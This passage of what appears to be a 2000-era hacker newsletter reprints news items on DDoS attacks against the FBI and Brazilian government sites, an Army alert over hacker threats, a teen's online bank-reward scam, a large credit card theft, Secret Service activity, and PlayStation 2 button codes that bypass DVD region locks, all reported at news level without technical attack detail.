Friday.

On Tuesday evening the Army placed its cyberdefenders at the Land Information
Warfare center at Fort Belvoir, Va., on full alert after a group known as the Boys
from Brazil threatened to hack into the Army home page on Friday.

But today the Army clarified that the hacker group it is watching is Hacking for
Girliez, which took down the New York Times' site in September 1998. Most of the
hackers' remarks appeared in comment tags, which can be seen in source material
but not on a Web page. The tags include such remarks as "'Immature kids' were able
to bypass...$25,000 firewalls [and] bypass the security put there."

Philip Loranger, chief of the Command and Control Protect Division in the Army's
Information Assurance Office, speaking here at the 2000 Army Directors of
Information Management Conference, said the Army is prepared for any attack
against the its Web site.

"We've had to activate some countermeasures to protect the Army home page,"
Loranger said, declining to provide specifics for security reasons. However, he said
the countermeasures being put in place do not include disconnecting the Army site
from the Internet.

Specific details emerged today on some of the steps the Army has taken in the past
few months to prepare for these types of attacks. Lt. Col. James Withers, a
systems engineering specialist with the Army signal command, said the Army's
regional CERTs have written special software scripts that will help defend against
known hacker tactics. The Army also developed Web cache proxy servers that
divert Web surfers away from primary servers residing behind firewalls on Army
installations.

The Army is also in the process of deploying a protected domain name system
architecture that will help the service regain control of all Army Internet sites and
network entry points.

"We know the hackers mapped [the old architecture]," Withers said, adding that 90
percent of the Army's global protected DNS architecture should be completed by
April.

Loranger demonstrated for conference attendees how simple it is for hackers to
exploit known operating system vulnerabilities using widely available hacker tools and
standard systems administrator procedures. In fact, Loranger, with the approval of
the Army's staff counsel, demonstrated a live hacking of another computer system
to show how within minutes hackers can crack into known password vulnerabilities
and take over entire systems and networks.

Loranger also said that the lack of international laws governing conduct on the
Internet poses real obstacles to the government's ability to respond to
foreign-based hacker attacks. Loranger pointed out that some graduate-level
computer education schools in India, for example, have established hacking into U.S.
government systems as an academic requirement.

Lt. Col. LeRoy Lundgren, program manager for the Army's National Security
Improvement Program, said as many as 285,000 network queries were denied by
Army security systems last year because of the questionable method used.
Lundgren added that the Army has seen an increase in the number of queries
originating in foreign countries, particularly China and Bulgaria.

@HWA

31.0 HNN:Mar 16th:NASA Fears CyberAttack From Brazil
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by William Knowles
NASA's Jet Propulsion Laboratory has blocked all access
to its web site from addresses originating in Brazil due to
fears of a cyber attack. JPL spokes people said that
access would be restored once additional security
measures where in place. (How does blocking one
country effect anything?)

Newsbytes
http://www.newsbytes.com/pubNews/00/145708.html

NASA Division Battles The Hack From Ipanema

By Robert MacMillan, Newsbytes WASHINGTON, DC, U.S.A., 15 Mar 2000, 1:15
PM CST

From Antonio Carlos Jobim to the samba, the US generally has welcomed some
of the cooler cultural exports from Brazil, but the latest one - a series
of hack attacks on NASA's Jet Propulsion Laboratory at CalTech - has the
agency bossa nova-ing its way toward beefing up its security measures.

JPL Spokesman Frank O'Donnell confirmed for Newsbytes an MSNBC report that
the agency has shut down access to queries emanating from Brazil until the
agency's security team makes some necessary improvements to its
network.

O'Donnell said that the Brazil shutout was not a "blacklist" attempt, as
earlier reports indicated.

"There was a number of recent attacks on JPL hosts originating from
various sites in Brazil, and as a temporary move while our computer
security people work, we're blocking network access to JPL from Brazil,"
O'Donnell said. "But this is a temporary thing."

He said normal service to South America's largest nation would return "in
a matter of days at most."

He added that he is "not aware of any (security) compromises per se in
these attacks."

Highly secure data at JPL generally is not stored on hosts that are
connected to the Internet, O'Donnell also said, but added that he could
"not go into a great deal of detail" on what kind of information was
sought.

MSNBC reported the Brazil problem after a network analyst at the

  
Bank of
Brazil in Brasilia reported that he could not access the JPL site.

The service also reported that a CERT official at its headquarters in
Pittsburgh, Pa., said that blocking access to an entire network or country
is reasonably common, though the official said that spoofing attacks -
when the address of the attacking e-mail in a denial of service
attack is falsified - blocking against a particular domain or country code
becomes largely ineffective.

O'Donnell said that CERT and the JPL have been working jointly on security
issues.

Reported by Newsbytes.com, http://www.newsbytes.com .

13:15 CST

@HWA



32.0 HNN:Mar 16th:FBI Site Hit by DOS Again
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/


contributed by William Knowles
Just as the FBI was posting information about the 50th
anniversary of its "Ten Most Wanted Fugitives" to its
web site it was hit with a denial of service attack. The
attacked forced the web site offline for several hours.

UPI - via Virtual New York
http://www.vny.com/cf/News/upidetail.cfm?QID=71527

FBI Web site attacked

Wednesday, 15 March 2000 15:15 (ET)

FBI Web site attacked

By MICHAEL KIRKLAND

WASHINGTON, March 15 (UPI) -- There has been another "denial of service"
cyber-attack against a high-profile Web site, sources told UPI Wednesday
-- this time the target was the FBI's own Web page, which was taken out
of action for several hours Tuesday.

The attack hit just as the FBI was posting information about the 50th
anniversary of its "Ten Most Wanted Fugitives" list, which was celebrated
Tuesday at the bureau with the opening of a permanent headquarters
exhibit.

A "denial of service" attack overwhelms a Web site with requests for
information, but with "spoofed" -- fabricated -- return e-mail addresses.
A site tries to endlessly answer the requests, and in effect ties itself
in knots until it shuts down.

There was no indication yet on whether Tuesday's cyber-attack was a
"distributed" denial of service attack, similar to those launched against
major commerical sites on the Internet early last month. Those attacks
temporarily crippled Yahoo!, E-Trade, CNN.com and others.

U.S. investigators were still pursuing leads on the latest attack
Wednesday, defining its nature.

A "distributed" attack is one which uses "innocent" third-party computer
systems.

Illegal hackers, called "crackers," usually find the attack software
"tools" available "in the wild" on the Internet.

The "distributed denial of service," or DDOS, tools enable a cracker to
break into an unsuspecting computer system and implant "packets" or
"daemons" that will cause the system to launch an attack against a target
unless detected and disabled in time. Literally hundreds of "zombie"
computer systems can be infected, without their operators' knowledge, and
can launch a simultaneous attack.

The FBI is still searching for at least two unnamed suspects in
February's attacks. Much of the search has been concentrated in
Canada with the help of the Royal Canadian Mounted Police.

Agents are also concentrating on Germany, where the DDOS "tools" may have
originated, though Germany is not believed to be the country of origin
for the actual attacks.

There was no immediate indication Wednesday that the attack on the FBI
site came from the same suspects wanted for the attacks on the commerical
sites.


-- Copyright 2000 by United Press International.
All rights reserved.


@HWA


33.0 HNN:Mar 16th:Teenager Arrested in Online Bank Scam
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/


contributed by Evil Wench
Someone has finally been arrested in a scam that has
been circling around the Internet for months. Various
online banks offer cash rewards just for opening an
account. The scam works by opening several accounts
under false names and then transferring the free money
from each account into a real account. A 14 year old
student at Thomas Jefferson Middle School in Jefferson
City Missouri was able to amass over $2000. The scam
was uncovered by a postal worker after he started
delivering 'bushels' of mail to an address owned by the
kids father. (Discovered by a postal worker?)

APB News
http://www.apbnews.com/newscenter/internetcrime/2000/03/15/netbanker0315_01.html


Teen Busted in Internet Banking Scam 120 Fake Accounts Yielded $2,000 in
Rewards

March 15, 2000

By Carol Huang

JEFFERSON CITY, Mo. (APBnews.com) -- An eighth-grader in rural Missouri
signed up for more than 120 fake bank accounts through the Internet to
rake in a total of $2,000 in new customer cash rewards, authorities said
today.

"He didn't realize the gravity of what he was doing, but he knew it was
wrong and that it wasn't his money," said Cole County Sheriff John
Hemeyer.

Hemeyer said the boy, 14, a student at Thomas Jefferson Middle School, had
been helping his father, a self-employed construction contractor, enter
business records onto a computer when he found an Internet site offering
an opportunity to open a bank account.

Eventually, the teen had more than 120 accounts at banks around the
country, each under a name generated by his computer, and had transferred
more than $2,000 in cash freebies into a real account of his own.

Puzzled postal worker

A puzzled postal worker reported delivering "bushels of baskets of mail"
to a vacant trailer on a plot of land, and investigating deputies went to
the boy's father, who owns the land.

Besides entering the teen into the juvenile court system, deputies
confiscated his computer, which he had upgraded using the cash rewards,
Hemeyer said.

"It's the only referral we've ever had on this kid. So if he quits, and
pays back some money, that will be about it," Hemeyer said.

Carol Huang is an APBnews.com staff writer (carol.huang@apbnews.com).


@HWA


34.0 HNN:Mar 16th:Former Employee Arrested For Attack On Company
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/


contributed by no0ne
31 year old Abdelkader Smires, was charged in United
States District Court in Brooklyn with computer-related
fraud and remained in custody pending a bail hearing on
Friday. Smires is being accused of causing his former
company, Internet Trading Technologies, Inc. (ITTI)
which provides software that allows market-makers to
conduct online securities transactions, to shut down
several times since last Thursday by directing
coordinated attacks against the firms computer
networks.

NY Times
http://www.nytimes.com/aponline/a/AP-Cyber-Spat.html

C|Net
http://news.cnet.com/news/0-1007-200-1573627.html?tag=st.ne.1002.thed.1007-200-1573627

Associated Press - via San Jose Mercury News
http://www.sjmercury.com/breaking/docs/073358.htm


NYTimes: pay

-=-

C|Net

ITTI employee arrested in hacker attack By Bloomberg News March 15, 2000,
4:20 p.m. PT

An employee of Internet Trading Technologies, a provider of
trade-execution services for securities firms, was arrested yesterday and
charged with attacking ITTI computers and causing interruptions in its
services this week, the U.S. Attorney's Office in Brooklyn said.

The employee, Abdelkader Smires, a database programmer, launched a series
of data transmissions intended to cause the firm's computers to crash
after he became involved in a dispute with his employers, according to
U.S. Attorney Loretta Lynch. He was arraigned in federal court in
Brooklyn yesterday and ordered held without bail, Lynch said.

ITTI's software system allows securities firms to
trade Nasdaq stocks online, a representative for the
company said. It is marketed by other firms, such as
Trimark Group, under their own brand names, she
said.

The system links small broker-dealers with
market-makers like Knight/Trimark, Mayer & Schweitzer
and others, a Knight/Trimark spokesman said. Firms use
it so they don't have to install and maintain
direct hardware and software connections to
market-makers.

Smires' attacks caused "significant interruption of ITTI's trade execution
over the past three business days," Lynch said. "If the attacks had
continued to cause denial of service, the viability of ITTI would have
been threatened, resulting in major disruption of trading on the
Nasdaq," she added.

The U.S. Secret Service's Electronic Crimes Task Force, which is a
cooperative effort of 25 local, state and federal agencies and 45 private
companies, helped trace Smires' computer attacks, said Bob Weaver, a
Secret Service representative.

Conflict developed between Smires and his bosses when ITTI's chief
development officer, who had hired Smires and was his supervisor, resigned
March 6, according to an affidavit filed in the case by Secret Service
Agent Peter Cavicchia. The firm then hired systems consultants to help
fill the gap created by the departure, but Smires and another,
unidentified programmer refused to help train the newcomers on ITTI's
systems, according to the affidavit.

Smires and the other programmer then told the firm's executives that they
would quit unless they were given "more employment security, a greater
salary and a greater equity interest in the firm," Cavicchia said. ITTI
responded by offering them one-year employment contracts, raises and
stock options, he said.

Smires and the other programmer nevertheless decided to resign, according
to the affidavit. The pair demanded "$70,000 immediately, 50,000 stock
options and more substantial salary increases," Cavicchia said. A
"tentative agreement" was reached March 8, Cavicchia said.

The next day, Smires and the other programmer backed out of the agreement,
demanded more favorable terms and said ITTI executives should call them
only if the firm agreed to the specific counter-offer, Cavicchia said.
ITTI didn't call. Later on March 9, the attacks on ITTI's system
began.

The attacks continued Friday, Monday and yesterday, according to the
affidavit, shutting down ITTI's computers for a total of about five hours.
"While one of the attacks was occurring, ITTI computers revealed the
Internet Protocol address of the attacking computer," enabling
employees to trace it to a building on the Queens College campus in
Flushing, New York, where Smires is an instructor, Cavicchia said. Secret
Service agents were told that the particular Queens College computer from
which the attack was launched was being used by Smires at the time, the
affidavit said.

After his arrest, Smires admitted that he was responsible for the March 13
and March 14 attacks, Cavicchia said.

Smires also waged some of his attacks from a Kinko's copy shop in
Manhattan, Lynch said.

Copyright 2000, Bloomberg L.P. All rights reserved.

-=-

Assoc.Press; 404


@HWA



35.0 HNN:Mar 16th:PlayStation2 can Play US DVD
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/


contributed by acopalyse
Some DVDs released for the North American Region can
be played on PlayStation2 consoles in England. While
pressing buttons in a certain sequence while the
PlayStation2 boots up into DVD mode can sometimes
allow Region 1 CDs to be played on the Region 2 device.
(Wonder if this will have any effect on the DeCSS
lawsuit?)

The Register UK
http://www.theregister.co.uk/000315-000017.html

Gaming Intelligence Agency
http://www.thegia.com/news/0003/n11a.html


Register;



Posted 15/03/2000 5:04pm by Linda Harrison

PlayStation 2 can play US DVDs - apparently

Gaming boffins claim to have found a way to play American DVDs on PlayStation 2
consoles.

Three codes have surfaced which make it possible to play Region 1 (North America)
DVDs on the PlayStation 2 -- a Region 2 (Europe, Japan and Asia) DVD player.

Like console video games, DVDs are usually fixed by vendors so they can only
operate within specific world markets. It was previously believed the PlayStation 2,
launched solely in Japan, could play only Region 2 DVDs.

But the Gaming Intelligence Agency's Web site this week claimed to have found the
codes needed to overcome this inconvenience. These codes do not work every time
-- a hitch believed to be linked to how hard the Dual Shock 2' buttons are pressed.

"All three codes should be entered when the PlayStation 2 DVD bootup sequence
begins fading to black... If you get a region failed message, don't despair; just try
again. The same disc will work some times and not others," it reports.

"While these codes certainly leave room for improvement, the advent of any region
bypass is good news for system importers and DVD fans," thegia.com adds.

Sony Computer Entertainment in the UK chose not to comment.®

-=-

GIA;

Play American DVDs on Japanese PlayStation 2

[03.11.00] » Simple controller codes make it possible.

Two simple controller codes have recently surfaced that make it
possible to play Region 1 (North America) DVDs on the PlayStation
2, a Region 2 (Japan and Asia) DVD player. Much like console
videogames, DVDs are region encoded to dissuade consumers from
importing titles from outside of the country. It was previously
believed that the PlayStation 2 would only play Region 2 DVDs.

These codes currently only work with about partial frequency. We
are currently unsure why they do not work 100% of the time; we
believe they may be dependent on how hard the user presses the Dual
Shock 2's analog buttons. If you own a PS2 and Region 1 movies, the
GIA is interested in hearing about your experiences with the code,
especially if you find a way to make Region 1 movies play with
greater frequency. Please e-mail staff@thegia.com with the movie
tested, code used, and the tries / success ratio.

All three codes should be entered when the PlayStation 2 DVD bootup
sequence begins fading to black. The buttons should be held until
either the DVD movie starts up (1 line of Japanese) or a "region
failed" message appears (2 lines of Japanese). If you get a region
failed message, don't despair; just try again. The same disc will
work some times and not others.

The first code comes from the GIA's own J.T. Kauffman; it is
apparently circulating Japanese message boards and web sites. The
code is: hold down L1, Circle, and Select. This code has worked
with both the Dual Shock 1 and 2 with about 40% accuracy.

The second code comes from a friend of the GIA known as Barubary.
The code is: press in L3 (the left analog stick) straight and hard.
This code does not work with the Dual Shock 1, but works with the
Dual Shock 2 with about 60% accuracy.

The newest, third code comes from GIA friend Nick "Rox" Des Barres.
Nick reports that this code works an astounding 95% of the time.
The instructions follow:

Insert a first-generation PlayStation pad (i.e., not an analog
controller) in Control Port 1 of the PS2. Insert DVD Hold UP on
the pad until the DVD menu appears Highlight the play icon and
select it.

Nick adds, "I tried this on 20 or so DVDs, and it booted all of
them. Two or three would not play. You could access the menus,
however. It should be noted I was using a Japanese first-generation
PS1 pad, though I can't imagine why it wouldn't work with American
ones."

While these codes certainly leave room for improvement, the advent
of any region bypass is good news for system importers and DVD
fans. The GIA will keep you posted on any new developments on the
PS2 DVD front.



@HWA


36.0 HNN:Mar 16th:ISTF Releases Security Recommendations
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Chris
The Internet Security Task Force, a conglomeration of
big name tech companies ISPs and other e-business
firms have produced a "vendor neutral set of
recommendations in understandable language" about the
problems and solutions in internet security. The paper
doesn't say anything new, but because it was released
by "credible" vendors and not "the evil underground"
some suits might finally pay attention. But then again,
maybe not.

Initial Recommendations For Conducting Secure eBusiness
http://www.ca.com/ISTF/recommendations.htm

@HWA

37.0 HNN:Mar 17th:485,000 Credit Cards Numbers Stolen, Found on Gov Computer
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
A file containing credit card numbers, expiration dates,
names and addresses was found last year on a US
government website. The thief has been traced back to
a European country but it has not been revelaed which
one. It is also not been revealed which online service
the numbers came from or which government agency
was unwittingly storing the numbers. The incident has
been confirmed by the Secret Service but first came to
light when a bank employee notified reporters. The bank
received the notice of the credit card heist from Visa
however failed to notify its card holders.

MSNBC
http://www.msnbc.com/news/382561.asp

Vast online credit card theft revealed

Hacker hid data on 485,000 cards on U.S. agency’s Web site
By Mike Brunker
© MSNBC

March 17 — In the largest known case of
cybertheft, a computer intruder stole information
on more than 485,000 credit cards from an
e-commerce site and then secretly stored the
massive database on a U.S. government agency’s
Web site, MSNBC.com has learned. Credit card
companies notified financial institutions, but
many of the compromised accounts remain open
to this day because the banks neither closed
them nor notified customers of the theft.

THE HEIST occurred in January 1999, but only a few
details have previously been made public.
The scope of the crime emerged in a letter dated Dec.
27 from Visa USA to member financial institutions. Jim
Macken, a Secret Service spokesman, confirmed that the
incident had occurred and added some details in an
interview on Thursday.


Two arrested in online credit card case

The Visa letter, a copy of which was provided to
MSNBC by a source in the banking industry, quotes federal
authorities as saying that the credit card information —
including expiration dates and cardholder names and
addresses — was stolen from an Internet retail site by a
hacker.

It said the store of
data on Visa,
MasterCard, American
Express and Discover
cards was discovered on
an unspecified government
computer system during an
audit. The letter did not
say when the stolen data
was found, but Macken
said it was discovered
before March 1999 on the
Web site of a U.S. government agency, which he declined
to identify.
.This government Web administrator noticed that a lot
of the memory was chewed up for no reason, so he
checked and found the file (containing the stolen data),. he
said.

NO EVIDENCE OF FRAUDULENT USE
There was no evidence that any of the cards were used
to commit fraud and some of the accounts were not active,
Macken added.
The letter said that authorities had not identified the
thief, but Macken said investigators have since traced the
criminal to Eastern Europe. The investigation is ongoing and
involves diplomatic contacts with the country in question, he
said.
The Internet retail site from which the data was stolen
has also since been identified, but Macken declined to name
it.

It was unclear why
the thief hacked the
government Web site and
stored the data there,
Macken said, though he
allowed that the act might
have been the online
equivalent of thumbing
one’s nose at U.S. authorities.
As MSNBC reported last week, U.S. authorities have
so far been stymied in their attempts to prosecute credit
card thieves and fraud rings based in the former Soviet bloc
nations and Asia.


Overseas fraud artists are untouchable


Secret Service officials testified about some details of
the case before Congress early last year to demonstrate the
peril that computer hackers pose to online commerce,
Macken said. Their comments generated little coverage,
however, and the scope of the case is only now becoming
clear.

EFFORT TO HIGHLIGHT INACTION

The copy of the letter from Visa was obtained by
MSNBC from an employee at the Navy Federal Credit
Union, in Merrifield, Va., the world’s largest credit union
with 19 million members. The letter was provided, the
source said, to highlight the fact that some financial
institutions are failing to act to protect consumers when
there is evidence that their credit card information has been
stolen.
Officials at the credit union took no action to warn
customers whose account numbers were among those
stolen by the hacker, said the source, who spoke on
condition of anonymity. Instead, they ordered a .spot
check. of 50 to 100 accounts and then decided that no
further action was necessary, the source said.
The source said the same procedure was followed two
weeks later, when Visa alerted the institution of the theft of
data on 300,000 credit cards from the CD Universe Web
site — the biggest theft of credit card data over the Internet
that previously had been made public.
.It was decided that ... it would be too much of an
inconvenience and too costly to shut down the accounts and
issue new numbers,. said the source. .It was deemed not
the credit union’s responsibility..
The credit union source said that fraudulent charges
have subsequently appeared on some of the accounts that
were compromised, though it is impossible to definitively
link the fraud to the theft.

CREDIT UNION RESPONDS

In a statement issued Friday in response to
MSNBC.com’s story, Navy Federal Credit Union officials
did not challenge the assertion that they did not warn
customers of the theft. But they denied that cost or
inconvenience were factors in the decision.
.When we received notification of this problem from
VISA USA, we reviewed our systems and were confident
that all appropriate controls were in place to protect our
members’ financial welfare,. said Tom Steele, a credit union
vice president in charge of the credit card division.
.Additional checks of the 1,500 Navy Federal credit card
accounts identified by VISA USA confirmed that the steps
we had taken safeguarded every cardholder — we have
also not seen any increase in fraud losses..
The statement also indicated that no Navy Federal
cardholders have been victims of identity theft as a result of
the heist.
Calls to American Express and a half dozen major
banks seeking information on their response when notified
of the theft were not returned.
Scott Lynch, a spokesman for Visa USA, said he
could not comment on the case. Nor would he explain why
Visa didn’t notify its members of the theft until December.
Alicia Zatkowski, a spokeswoman for Discover
Financial Services, said the firm’s fraud investigators were
not aware of such a case.
Vincent DeLuca, vice president of fraud control at
MasterCard International, said, .We are aware of some
cases but we’re not at liberty to talk about any ongoing
investigations.

Several financial institutions ordered the wholesale
closure and replacement of cards that were compromised in
the CD Universe case, which also remains under
investigation. Such across-the-board replacement programs
were well publicized in an effort to assure online consumers.

Banks and credit card companies often point out that
consumers are responsible only for the first $50 of
fraudulent online purchases — and that is nearly always
waived.

But stolen credit card information can be used to
commit fraud against unsuspecting Internet merchants, who
in most cases bear the cost of the crime, or for identity theft
— a practice in which criminals use personal data to obtain
new credit, borrow money or make big-ticket purchases.
The Treasury Department on Wednesday held a
two-day national summit on identity theft to focus attention
on what Treasury Secretary Lawrence Summers described
as .a growing and major criminal threat..
At the session, victims said that while they did not
ultimately have to pay for the losses run up in their names,
identity theft is by no means a victimless crime.
.It has been sheer hell, and I do mean hell,. said
Darlene Zele, a Rhode Island hospital worker who one of
the victims who testified about years of struggling to repair
the havoc wrought on their credit records. .At this point,
after five years, it’s still not over..

Got a tip about the use or abuse of credit cards online?
Write to tipoff@msnbc.com.

@HWA

38.0 HNN:Mar 17th:Brazil Gov Sites Suffering Under DDoS Attacks
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by webmaster
A group called DDoS-BR is spreading denial of service
attacks against Brazilian government networks. The
Brazilian Supreme Court and the National
Telecommunications Agency web sites have been
shutdown for most of the week due to the attacks. The
Brazilian authorities are looking forward legislation that
will soon be approved which might give the federal
police enough power to investigate and arrest electronic
criminals. (Hopefully they have the knowledge to use
that power wisely.)

SecureNet - In Spanish correction: Portuguese ...
http://www.securenet.com.br/cgi-bin/news?id=15030003

@HWA

39.0 HNN:Mar 17th:Secret Service Harassing Bernie S Again
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by macki
Five years to the day after Bernie S. was arrested at
gunpoint and subjected to nearly 17 months of
imprisonment by the United States Secret Service,
agents of the USSS have again begun some kind of cat
and mouse game, the nature of which has yet to be
revealed.

2600
http://www.2600.com/news/2000/0317.html

SECRET SERVICE HARASSING BERNIE S AGAIN

03/17/00

Five years to the day after Bernie S. was arrested at gunpoint and
subjected to nearly 17 months of imprisonment by the United States Secret
Service, agents of the USSS have again begun some kind of cat and mouse
game, the nature of which has yet to be revealed.

A Special Agent from the Secret Service showed up unannounced at
Bernie's workplace and told his employer they wanted to question Bernie,
who happened to be out sick that day. When Bernie returned to work the
following day and discovered the Secret Service wanted to talk to him, he
surprised the agent by calling him. What followed was an extremely strange
and circular conversation.

At first the SS agent wouldn't talk to him at all. Then he called
Bernie back and said they needed to talk with him at his home at 7am the
next morning. When Bernie explained he was just getting over a serious
illness and that this was an unreasonable hour, the agent suggested 6am.
Bernie repeatedly offered to answer their questions at several neutral
locations, but they said any place other than his home was unacceptable.
Bernie told them he had nothing to hide, but that he was not comfortable
having Secret Service agents poking around inside his house and that they
would have to get a warrant before he'd let them in. The agent then said
he had to go and would talk to him later.

About ten minutes later, a second, more polished, SS agent called
Bernie and continued trying to persuade him to let them inside his home.
The agent tried to goad Bernie by implying he must have something to hide,
and that if he didn't then there was no reason why they shouldn't be
allowed inside his home. At this point, Bernie tried to explain by saying
if you asked 100 people on the street if they'd want federal agents in
their living room and bedroom, almost everyone would say no and that he
was no exception. The SS agent disagreed, saying people have no legitimate
fears about such a visit.

Bernie repeatedly tried to get the SS agents to tell him what they
wanted. Finally, the second agent said, "I need to check to see if your
telephone and Cable TV wiring is hooked up properly." This preposterous
claim made Bernie actually laugh out loud. But as a further gesture of
cooperation, Bernie offered to allow Bell Atlantic and Comcast Cable TV
technicians to inspect his house wiring for them. The SS agents said that,
too, would be unacceptable. It became clear the SS agents were simply
trying anything they could to get a foot in his door. Needless to say,
after Bernie's previous horrendous experience with the Secret Service,
their feet are not welcome in his home. He then gave them his attorney's
name and telephone number and told them to address future inquiries
directly to his lawyer.

So what is this all about? We don't know yet, but clearly something
is up. And the way the Secret Service has played sick games with people's
lives in the past, we felt it would be wise to alert everyone now so we
can all keep a closer eye on them before they try any further outrageous
actions under the veil of secrecy.

@HWA

40.0 HNN:Mar 17th: Secret Service to Work with Citicorp to Fight Fraud
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
The U.S. Secret Service and Citicorp, a unit of New
York-based Citigroup Inc., are working together to
develop a pilot program to fight identity theft and other
types of e-commerce fraud. The program will devise a
strategy to identify suspicious e-commerce activities,
including forged identities and other schemes used to
commit bank and credit fraud.

Computer World
http://www.computerworld.com/home/print.nsf/all/000316C9BE

US Treasury Dept. - Press Release
http://www.ustreas.gov/press/releases/ps465.htm

Computer World;


Secret Service, Citicorp team to
fight e-commerce fraud

U.S. Treasury Department announces new initiatives to
combat identity, other types of e-commerce fraud

By Linda Rosencrance
03/16/2000 The U.S. Secret Service and Citicorp, a unit of
New York-based Citigroup Inc., are working together to
develop a pilot program to fight identity theft and other
types of e-commerce fraud, according to a statement
issued by the U.S. Treasury Department.

The announcement was made at the two-day National
Summit on Identity Theft convened by Treasury
Secretary Lawrence H. Summers yesterday. The summit
includes more than 150 participants from federal, state
and local government agencies; financial institutions;
credit-card companies and reporting agencies; as well
as identity theft victims and consumer advocacy groups.

"Criminals are exploiting new technologies to make a
significant profit from an old crime," Summers said in
the statement. "We will continue to work with the
private sector to strengthen our efforts to combat this
threat."

The program being developed by the Secret Service and
Citicorp will devise a strategy to identify suspicious
e-commerce activities, including forged identities and
other schemes used to commit bank and credit fraud.

At yesterday's summit, Summers also said that the
Secret Service is developing a computer-based training
program to help law enforcement officials handle
financial crimes.

-=-

Press Release;

TREASURY NEWS

FROM THE OFFICE OF PUBLIC AFFAIRS

FOR IMMEDIATE RELEASE
March 15, 2000
LS-465

TREASURY CONVENES IDENTITY THEFT SUMMIT

Treasury Secretary Lawrence H. Summers convened a two-day National Summit
on Identity Theft today and announced four new initiatives targeted at
cracking down on the increasing threat of identity theft.

Criminals are exploiting new technologies to make a significant profit
from an old crime," said Treasury Secretary Summers. "We will continue to
work with the private sector to strengthen our efforts to combat this
threat."

Called for last year by President Clinton, the Summit will address the
prevention of identity theft, remediation and enforcement efforts with the
public and private sector. The Summit will consist of a series of panels
and more than 150 participants from federal, state and local
government agencies, financial institutions, credit card companies and
reporting agencies, as well as identity theft victims, consumer advocacy
groups and private sector representatives.

The four new Treasury initiatives to help combat identity theft include:

Skimming and counterfeit check databases currently used to identify
common suspects, defendants of identity theft, and address criminal
trends prevalent in financial crimes today. These databases were
developed and are maintained by the U.S. Secret Service in
partnership with the financial industry;

A computer-based training module developed by the U.S. Secret Service
that will focus on financial crimes and all pertinent statutes
including identity theft, and be made available within the agency as
well as local and state law enforcement officials
throughout the U.S.;

A pilot program, developed by the U.S. Secret Service and Citicorp,
to help identify suspicious activity on electronic commerce. The
program will attempt to develop a protocol for the identification of
identity theft and other schemes used to commit bank
fraud, credit fraud and money laundering within electronic commerce
and the immediate notification of law enforcement authorities; and

Forums and mini-conferences to maintain a dialogue between the
private and public sector.

Treasury's National Summit on Identity Theft is the first national level
conference involving law enforcement, victims, industry and nonprofits
interested in the issue.


@HWA

41.0 HNN:Mar 17th:Computer History Lecture Series
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by McIntyre
The Computer Museum History Center, a non-profit
entity dedicated to the preservation and celebration of
computing history, will be having a lecture series
entitled "Early Computer Crime". Speakers include
Whitfield Diffie, John Markoff, Peter Neumann and Cliff
Stoll. The Lecture will be held on Thursday, March 23,
2000 at NASA Ames Research Center Auditorium,
Moffett Field, Mountain View, CA. It is requested that
RSVPs be received by Monday March 20. (Sounds like
fun. I would like to cheer some the speakers and heckle
others.)

The Computer Museum
http://www.computerhistory.org/events/earlycrime_03232000/

@HWA

42.0 HNN:Mar 17th: Australian Police To Increase Online Presence
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by William Knowles
Australian Federal Police Commissioner Mick Palmer said
that in an effort to get better training for the people
they already have and in an effort to attract more
qualified applicants the Police will conduct a staff
exchange with private industry. The commissioner will
also establish an Electronic Crime Steering Committee to
evaluate Australia's capacity to fight electronic crime
and will develop an Australian Law Enforcement
Electronic Crime Strategy by mid summer.

The Age
http://www.theage.com.au/breaking/0003/17/A15120-2000Mar17.shtml

Police to step up fight against e-crime

Source: AAP | Published: Friday March 17, 3:38 PM

Police are set to recruit computer boffins in a bid to boost the fight
against so-called e-crime.

The potential to commit crimes using computers and other information
technology was one of the greatest problems ever to face law enforcement,
Australian Federal Police Commissioner Mick Palmer said today.

Speaking at the end of a week-long conference of police commissioners
from Australia, New Zealand, Fiji and Papua New Guinea, Commissioner
Palmer said a staggering 900 million people would be using the Internet
by the end of this year.

'People who abuse these technologies have the capacity to commit offences
on a global basis, with complete anonymity, with speed and on a scale not
previously encountered,' Commissioner Palmer told journalists.

Credit card fraud, electronic vandalism, terrorism, electronic money
laundering and tax evasion are some examples of electronic crime.

'The capacity of properly organised, electronic based crime to undermine
the financial stability of small and medium sized countries is very
real,' Commissioner Palmer said.

A major problem for police is how to attract personnel with enough
technical expertise to fight this new crime.

Commissioner Palmer said already police recruitment and selection was
becoming more flexible.

'Clearly some of the technical skills that we are going to need ... come
at a very high cost,' he said.

'People ... in that industry are earning a lot of money and that makes
the partnerships with business and the wider business community very
important.'

Police will be looking to exchange staff with private industry to gain
the skills necessary, probably on short term, project based arrangements.

Commissioner Palmer said discussions and negotiations had already begun
on this issue and Commonwealth Bank CEO David Murray addressed the
commissioners.

'We will be recruiting people from the coalface for short periods of
time, we are going to be sharing resources between ourselves and the
wider partnership both in the private and public sense.'

The commissioners agreed to establish an Electronic Crime Steering
